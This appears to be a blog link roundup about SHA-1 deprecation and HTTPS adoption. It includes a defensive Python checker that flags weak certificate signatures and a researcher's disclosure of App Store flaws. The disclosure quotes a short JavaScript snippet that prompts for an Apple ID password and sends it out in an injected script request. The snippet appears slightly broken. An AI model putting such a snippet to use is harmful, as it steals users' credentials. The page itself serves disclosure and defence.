Why Google is Hurrying the Web to Kill SHA-1

Something like 90% of websites that use SSL encryption use an algorithm called SHA-1 to protect themselves from being impersonated. This is what guarantees that when you see the green lock for facebook.com, you’re visiting the real Facebook and not giving your password to an attacker.

Unfortunately, SHA-1 is dangerously weak, and has been for a long time. It gets weaker every year, but remains widely used on the internet. Its replacement, SHA-2, is strong and supported just about everywhere.

Google recently announced that if you use Chrome, you’re about to start seeing a progression of warnings for many secure websites that still rely on SHA-1.

Why Google is Hurrying the Web to Kill SHA-1 →
Check your site for weak SHA-1 certificates →
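The check the link above points to boils down to reading the signatureAlgorithm field of a certificate and flagging anything that resolves to SHA-1 (or MD5). The following is an added example, not code from the original post or from Google’s tooling: a small DER walker that extracts that field from an X.509 certificate (PEM or DER), maps the OID to its hash, and also confirms that the algorithm declared inside tbsCertificate matches the outer one, since a mismatch is a sign of a malformed or tampered certificate. The sample certificates it builds are constructed, unsigned placeholders (the `make_sample_cert` helper and the OID table are this example’s own); point `check_cert` at a real PEM file to use it on your own chain.

```python
import base64
import re

# Signature-algorithm OIDs (RFC 3279 / RFC 4055 / RFC 5758) mapped to
# (name, hash). Anything whose hash is md5 or sha1 is flagged as weak.
SIG_ALG_OIDS = {
    "1.2.840.113549.1.1.4": ("md5WithRSAEncryption", "md5"),
    "1.2.840.113549.1.1.5": ("sha1WithRSAEncryption", "sha1"),
    "1.2.840.113549.1.1.11": ("sha256WithRSAEncryption", "sha256"),
    "1.2.840.113549.1.1.12": ("sha384WithRSAEncryption", "sha384"),
    "1.2.840.113549.1.1.13": ("sha512WithRSAEncryption", "sha512"),
    "1.2.840.10045.4.1": ("ecdsa-with-SHA1", "sha1"),
    "1.2.840.10045.4.3.2": ("ecdsa-with-SHA256", "sha256"),
    "1.2.840.10045.4.3.3": ("ecdsa-with-SHA384", "sha384"),
}
WEAK_HASHES = {"md5", "sha1"}


def _read_tlv(buf, pos):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    """Turn OBJECT IDENTIFIER content octets into dotted notation."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:                      # base-128 arcs, high bit = continuation
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def _alg_oid(alg_identifier):
    """AlgorithmIdentifier ::= SEQUENCE { algorithm OID, parameters ANY OPTIONAL }."""
    tag, oid_bytes, _ = _read_tlv(alg_identifier, 0)
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    return _decode_oid(oid_bytes)


def cert_signature_info(cert):
    """Return (outer_oid, inner_oid): the Certificate.signatureAlgorithm and the
    TBSCertificate.signature algorithm, which RFC 5280 requires to be identical."""
    if isinstance(cert, str):
        cert = cert.encode()
    if cert.lstrip().startswith(b"-----BEGIN"):   # PEM: strip armour, base64-decode
        cert = base64.b64decode(re.sub(rb"-----[^-]+-----|\s", b"", cert))
    tag, body, _ = _read_tlv(cert, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    # Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }
    _, tbs, pos = _read_tlv(body, 0)
    _, sig_alg, _ = _read_tlv(body, pos)
    # TBSCertificate ::= SEQUENCE { [0] version OPTIONAL, serialNumber, signature, ... }
    tag, _, nxt = _read_tlv(tbs, 0)
    pos = nxt if tag == 0xA0 else 0
    _, _, pos = _read_tlv(tbs, pos)        # skip serialNumber
    _, inner_alg, _ = _read_tlv(tbs, pos)
    return _alg_oid(sig_alg), _alg_oid(inner_alg)


def check_cert(cert):
    """Summarise the signing hash and whether a browser will soon distrust it."""
    outer, inner = cert_signature_info(cert)
    name, hash_name = SIG_ALG_OIDS.get(outer, (outer, "unknown"))
    return {"algorithm": name, "hash": hash_name,
            "weak": hash_name in WEAK_HASHES, "consistent": outer == inner}


# --- constructed sample data below; not real certificates ---------------------

def _der(tag, payload):
    """Encode one TLV with short- or long-form length."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def _encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, (a & 0x7F) | 0x80)
            a >>= 7
        out.extend(chunk)
    return _der(0x06, bytes(out))


def make_sample_cert(sig_oid, inner_oid=None):
    """Build a structurally valid but unsigned, constructed DER certificate
    (RSA-style NULL parameters) so the checker can be exercised offline."""
    alg = lambda o: _der(0x30, _encode_oid(o) + b"\x05\x00")
    tbs = _der(0x30, _der(0xA0, _der(0x02, b"\x02"))       # version v3
                     + _der(0x02, b"\x01")                   # serialNumber 1
                     + alg(inner_oid or sig_oid)             # inner signature alg
                     + _der(0x30, b""))                      # issuer placeholder
    return _der(0x30, tbs + alg(sig_oid) + _der(0x03, b"\x00" * 9))


def to_pem(der):
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.5", "1.2.840.113549.1.1.11"):
        print(check_cert(make_sample_cert(oid)))
```

Only the leaf certificate and intermediates matter for the Chrome warnings; root certificates are trusted by their presence in the store, not by their signature, so a SHA-1 root alone is not what triggers the warning.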

Got SSL?

This talk is a call to arms to all of you as web developers. In the next 30 minutes, I hope to convince you of the necessity and practicality of SSL today, and then give you some pointers on how to go make it happen.

Be sure to hit the S key (or press the cog at the bottom and select “Open Speaker Notes”) to show the presenter notes that go with this talk.

Got SSL? →

Long overdue: HTTPS for the App Store

In early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. In early March Apple finally issued a fix for it and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users. This post discusses the vulnerabilities I found.

Attacks included password stealing, app swapping, fake app upgrades, preventing application installation, and privacy leaks — all made possible by simply intercepting and manipulating the HTML used by the App Store app.

 password = prompt("Apple ID Password","");
 var s = document.createElement('script');
 s.type = "text/javascript";  
 s.src = "fakepassword=" + password;
 var script = document.createTextNode(s);

May this be a lesson for all those offering services out there to enable SSL and route all traffic over HTTPS.

Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities →